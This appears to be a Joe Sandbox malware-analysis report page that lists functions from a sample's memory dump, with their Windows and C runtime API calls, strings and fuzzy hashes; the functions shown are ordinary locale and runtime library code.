Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 8dd7dfb75d7d52c0750a5127d57d696a5d27f07798467dd46a5266a64faa7a75
Instruction ID: 99844ba1ebd3037cac28b108248fb40d43ba766022fa74ef32a3f672e5e9ae82
Opcode Fuzzy Hash: 8dd7dfb75d7d52c0750a5127d57d696a5d27f07798467dd46a5266a64faa7a75
Instruction Fuzzy Hash: 23B1447090062A8BDB39FF6CC550ABFBBB8AF4570CF10061EE566D7291C730A645CB95

Uniqueness

Uniqueness Score: -1.00%

Function 013421DB Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

EnumSystemLocalesW.KERNEL32(01342301,00000001,00000000,?,-00000050,?,01342932,00000000,?,?,?,00000055,?), ref: 0134224D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 21a41faa657c65ac93ba75a52e9452e2029987aa5e6fd2a58fa264d5f4c40d24
Instruction ID: 558e8ee949eb26214d754a8ca766e9a474407e0f60b489d30eb93966a73d8c97
Opcode Fuzzy Hash: 21a41faa657c65ac93ba75a52e9452e2029987aa5e6fd2a58fa264d5f4c40d24
Instruction Fuzzy Hash: E011E53A2007059FDB189F79E8916BBB7E1FF8436CB15442CE98697A41D771B942C740

Uniqueness

Uniqueness Score: -1.00%

Function 01342783 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0134251D,00000000,00000000,?), ref: 013427AF

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: fe1ae13ef9670a7ca025d53cebdd0e4fb9e2944d354e50c628e5943c8c9c0f30
Instruction ID: a102f504e5f869f281c8215efc5d9465e4c9024a365dd37e8f635ea48d753547
Opcode Fuzzy Hash: fe1ae13ef9670a7ca025d53cebdd0e4fb9e2944d354e50c628e5943c8c9c0f30
Instruction Fuzzy Hash: 13F0A436610116BBEB289A69EC45BBB7FA8FB4075CF054429FD06B3181EB74F941C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 01342276 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

EnumSystemLocalesW.KERNEL32(01342554,00000001,?,?,-00000050,?,013428F6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 013422C0

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f4da8ca9b8c54753130d739b781f8eb9a11676022c523bbf18abe29c5cb9dd09
Instruction ID: d252c69d5ec6483ec05760363f244ffc81ac612aebccf53fa1d9ec8b968f14d3
Opcode Fuzzy Hash: f4da8ca9b8c54753130d739b781f8eb9a11676022c523bbf18abe29c5cb9dd09
Instruction Fuzzy Hash: 90F0F6363003095FDB249F7DA880A7B7BD5EF8036CF05446CF9459B640C6B1B942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013373C6 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 013310BF: EnterCriticalSection.KERNEL32(-0145A9F0,?,01336724,?,013552B8,0000000C,013369EF,?), ref: 013310CE

EnumSystemLocalesW.KERNEL32(013373B9,00000001,01355318,0000000C,013377E8,00000000), ref: 013373FE

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: c9b79e3d54c9865aeb2639d5745d8b7d9e236b06ec693be14468df4a58ff8c2d
Instruction ID: af50e00a453c2c354c31a71a308579719905dce14e6fc5167549cfcc828b9583
Opcode Fuzzy Hash: c9b79e3d54c9865aeb2639d5745d8b7d9e236b06ec693be14468df4a58ff8c2d
Instruction Fuzzy Hash: CAF04972A00302DFD720EF9CE442B9D7BF0EB84729F10812AE815DB390CB7599459B95

Uniqueness

Uniqueness Score: -1.00%

Function 01342190 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7

EnumSystemLocalesW.KERNEL32(013420E9,00000001,?,?,?,01342954,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 013421C7

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c3a4e7e90b22a1ca1fc5988f8cee244d9ad2d15c74a9e77f1a277e5a78a7a9a7
Instruction ID: 8a246561555a5990b368311ec1b5049478ed15bbef3e592b671440e08906bc57
Opcode Fuzzy Hash: c3a4e7e90b22a1ca1fc5988f8cee244d9ad2d15c74a9e77f1a277e5a78a7a9a7
Instruction Fuzzy Hash: 34F0E53A300249A7CB15AF7AEC45B6B7FD4EFC1728B064099FF099B641C671A882C750

Uniqueness

Uniqueness Score: -1.00%

Function 013378EC Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0133626D,?,20001004,00000000,00000002,?,?,0133586F), ref: 01337920

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f02cf184543d396b1ab0a4ca5a949aa9430517199d09e6f93b8933d2ccc7a022
Instruction ID: 7d2401bdd4fbcff0e94457495f3339b74950622c42da3845006e09b290054aa9
Opcode Fuzzy Hash: f02cf184543d396b1ab0a4ca5a949aa9430517199d09e6f93b8933d2ccc7a022
Instruction Fuzzy Hash: 53E0867550011DBBDF222FA4DC04F9E7F19EF847A4F018111FD0566621CB3199319BD8

Uniqueness

Uniqueness Score: -1.00%

Function 01342AB4 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 01342AB4

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 88449d01877c7658624bfb512ef89c6faaaff7456f128cc9350bbfe740ef04dc
Instruction ID: a93ed687167abb637c291c54605a62e7995323041086b646c768eaadf4f354b4
Opcode Fuzzy Hash: 88449d01877c7658624bfb512ef89c6faaaff7456f128cc9350bbfe740ef04dc
Instruction Fuzzy Hash: A0A0247C101300CFC3504F31530430D35DDFF057C07044055D100C4114DF30C0004700

Uniqueness

Uniqueness Score: -1.00%

Function 0133D969 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e2944bcce131199e752fe203d5283bfd464a3bd7f21dd2a3c776765c2e216c
Instruction ID: ad013c57e245d6cccb8cf71f7543a29d031c962ac278acaae40135a4f2f44acd
Opcode Fuzzy Hash: d0e2944bcce131199e752fe203d5283bfd464a3bd7f21dd2a3c776765c2e216c
Instruction Fuzzy Hash: 0E320421D29F014ED7339538C862335A64DAFB73D8F15D737E81AB5A9AEF29D4834204

Uniqueness

Uniqueness Score: -1.00%

Function 0134199F Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 2cee698dafcdaf8c3ea87d44df52a42072c243241330c1a77fbf746219897567
Instruction ID: 9731f1d18641f3506ef7f3bf384d667ed49d063e180a7bbab10ac0b94c1f5398
Opcode Fuzzy Hash: 2cee698dafcdaf8c3ea87d44df52a42072c243241330c1a77fbf746219897567
Instruction Fuzzy Hash: 3FB1E175600B069BDB38AB28CC81BB7B3E9EB4430CF44452DEA8786591FA74B985CB14

Uniqueness

Uniqueness Score: -1.00%

Function 01325390 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013253BC
std::_Lockit::_Lockit.LIBCPMT ref: 013253D9
std::_Lockit::~_Lockit.LIBCPMT ref: 013253FD
std::_Lockit::~_Lockit.LIBCPMT ref: 01325428
std::_Lockit::_Lockit.LIBCPMT ref: 0132549A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013254EF
__Getctype.LIBCPMT ref: 01325506
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01325546
std::_Lockit::~_Lockit.LIBCPMT ref: 013255E8
std::_Facet_Register.LIBCPMT ref: 013255EE

Strings

bad locale name, xrefs: 01325608

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 941e45479cce8ee024d912b1912dd1fefaa11ef9029572c433b622537b0eb88b
Instruction ID: 88425e00828df31f0c8874be78ad7a8be4d4a2bc9784a768fbd13695611702c1
Opcode Fuzzy Hash: 941e45479cce8ee024d912b1912dd1fefaa11ef9029572c433b622537b0eb88b
Instruction Fuzzy Hash: FD61B5B19043618FE721EF28D480B5BB7E4FF9471CF14495DE989A7212EB34E648CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01325960 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 202COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013259CC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01325A21
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01325B99
std::_Lockit::~_Lockit.LIBCPMT ref: 01325C3B
Concurrency::cancel_current_task.LIBCPMT ref: 01325C63

Strings

., xrefs: 01325AEB
bad locale name, xrefs: 01325C59
false, xrefs: 01325ABA
true, xrefs: 01325AD4
,, xrefs: 01325B43

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$Concurrency::cancel_current_taskLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: ,$.$bad locale name$false$true
API String ID: 3204333896-3659324578
Opcode ID: 29cce177f64b504992a7d162b8ad457ab570de62892f9527edb9df03b1ee0040
Instruction ID: 99917375f485097b9167d32416566c77d3ae7c8786609517479c7ca3ce294112
Opcode Fuzzy Hash: 29cce177f64b504992a7d162b8ad457ab570de62892f9527edb9df03b1ee0040
Instruction Fuzzy Hash: 268186B19083959FE720EF28C941B9BB7E4AF95708F044A1DF98997240F774E248CB53

Uniqueness

Uniqueness Score: -1.00%

Function 01324E70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 01324E90
std::_Lockit::_Lockit.LIBCPMT ref: 01324EAA
std::_Lockit::~_Lockit.LIBCPMT ref: 01324ECB
std::_Lockit::~_Lockit.LIBCPMT ref: 01324EF3
std::_Lockit::_Lockit.LIBCPMT ref: 01324F5F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01324FB4
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01324FCB
std::_Lockit::~_Lockit.LIBCPMT ref: 0132506D
std::_Facet_Register.LIBCPMT ref: 01325073

Part of subcall function 013267D7: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013267E3

Strings

bad locale name, xrefs: 0132508D

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
String ID: bad locale name
API String ID: 1592514138-1405518554
Opcode ID: c02cdb69f3717e6e51e8919d8fe21bb4cb7085a3ade6d27804d401c11962b5b0
Instruction ID: a002eed4ef12f72d6b1256d057bce9bc13db0bc2782d67550809caf422f2919b
Opcode Fuzzy Hash: c02cdb69f3717e6e51e8919d8fe21bb4cb7085a3ade6d27804d401c11962b5b0
Instruction Fuzzy Hash: 6D51B2B15083519FEB20EF28D884B1BBBE4AF94758F04485DF98997351E734E908CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 0132D1A8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0132D2C7
___TypeMatch.LIBVCRUNTIME ref: 0132D3D5
_UnwindNestedFrames.LIBCMT ref: 0132D527
CallUnexpected.LIBVCRUNTIME ref: 0132D542

Strings

csm, xrefs: 0132D2FE
csm, xrefs: 0132D252
csm, xrefs: 0132D1E5

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: d12dcda419923d74f45e4a739b48c648371c7deee169dd3d8437457bb5aa4226
Instruction ID: bbefc403a119a300d18629bea6b237a53bda97a7430d91c8fa21db6559e2f5f1
Opcode Fuzzy Hash: d12dcda419923d74f45e4a739b48c648371c7deee169dd3d8437457bb5aa4226
Instruction Fuzzy Hash: BFB1AE71C0022AEFDF25EFE8D8809AEBBB5FF15318F14415AE9046B212D770EA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0134687A Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0166EEF8,0166EEF8,?,7FFFFFFF,?,01346B4A,0166EEF8,0166EEF8,?,0166EEF8,?,?,?,?,0166EEF8,?), ref: 01346920
__alloca_probe_16.LIBCMT ref: 013469DB
__alloca_probe_16.LIBCMT ref: 01346A6A
__freea.LIBCMT ref: 01346AB5
__freea.LIBCMT ref: 01346ABB
__freea.LIBCMT ref: 01346AF1
__freea.LIBCMT ref: 01346AF7
__freea.LIBCMT ref: 01346B07

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 10972dd37d57e76a59c72f9e4713a1df02d3fa9fc7a3b184e63b6e823df9f251
Instruction ID: da7e50aaedbe76f01bdc69b89c3f0fd30693e53fb730ce99478a8de8c5ea0cc0
Opcode Fuzzy Hash: 10972dd37d57e76a59c72f9e4713a1df02d3fa9fc7a3b184e63b6e823df9f251
Instruction Fuzzy Hash: 7D71E5F2A0461AABEF219F5D8C42FEE7BF99F4631CF190059E904A7281D775E804C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01329822 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0132986B
__alloca_probe_16.LIBCMT ref: 01329897
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 013298D6
LCMapStringEx.KERNEL32 ref: 013298F3
LCMapStringEx.KERNEL32 ref: 01329932
__alloca_probe_16.LIBCMT ref: 0132994F
LCMapStringEx.KERNEL32 ref: 01329991
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 013299B4

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 153ac4858f24eeec8c5aeacd2a704e590c57cc9fc404675363726395fffa8ec8
Instruction ID: 4ad202d13749c576ee2e6d8734302cd70cdbf16ecab2f8df86c5decaa8e0385e
Opcode Fuzzy Hash: 153ac4858f24eeec8c5aeacd2a704e590c57cc9fc404675363726395fffa8ec8
Instruction Fuzzy Hash: EB519F7260023BABEF206FA8CC44FAF7FA9EF5476CF154425FA15A6150DB759810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0132CE3A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0132CE31,0132AAC8,0132A707), ref: 0132CE48
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0132CE56
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0132CE6F
SetLastError.KERNEL32(00000000,0132CE31,0132AAC8,0132A707), ref: 0132CEC1

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d4a7a5671212be1ecf9127304336e66c82925b532944729db89550dda1ba7540
Instruction ID: 9a24d4ef6a85d08021b75cfd260309606f3efde60cce20aa7554ffd3d6b2a1a2
Opcode Fuzzy Hash: d4a7a5671212be1ecf9127304336e66c82925b532944729db89550dda1ba7540
Instruction Fuzzy Hash: B301D47210D7326FE73536BDBC8666F2A5CEB1177EB20123AE128561E0EF6948019284

Uniqueness

Uniqueness Score: -1.00%

Function 01334DE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,51F7B458,?,?,00000000,01347A3A,000000FF,?,01334D77,01334EA7,?,01334D4B,00000000), ref: 01334E1C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01334E2E
FreeLibrary.KERNEL32(00000000,?,?,00000000,01347A3A,000000FF,?,01334D77,01334EA7,?,01334D4B,00000000), ref: 01334E50

Strings

mscoree.dll, xrefs: 01334E15
CorExitProcess, xrefs: 01334E26

Memory Dump Source

Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true

Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
